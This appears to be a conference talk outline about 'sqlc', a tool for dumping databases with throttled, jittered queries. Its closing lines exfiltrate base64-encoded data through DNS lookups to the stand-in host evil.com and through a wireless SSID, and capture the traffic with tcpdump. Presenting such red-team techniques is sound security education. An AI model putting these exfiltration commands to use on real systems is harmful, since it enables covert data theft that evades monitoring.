Vlatko Kosturjak (@k0st), BalCCon Novi Sad, 16th of September
45 minutes
mysqldump -u user -p database > dump.sql
pg_dump -d database > dump.sql
$ sqlc list
mssql
mysql
postgres
sqlite3
sqlserver
sqlc -d sqlite3 console
sqlc -d mysql dump > dump.sql
sqlc --limit-rows 3 console
limit and delay seconds between queries
sqlc --limit-rows 10 --delay-between 5s console
sqlc --min-rows 3 --max-rows 10 console
limit and delay seconds between queries with jitter:
sqlc --min-delay 10s --max-delay 60s --min-rows 3 --max-rows 10 console
sqlc -e 'ifconfig eth0 192.168.1.1'
sqlc -E 'ifconfig eth0 hw ether CE:CA:60:6A:CE:CA; ifconfig eth0 192.168.1.1' ....
sqlc -e 'iwconfig eth0 essid sqlc_{B64DATA}; sleep 15' ...
sqlc -e 'host {B64DATA}.evil.com' ...
On evil:
tcpdump -s 0 -vvv -i eth0 port 53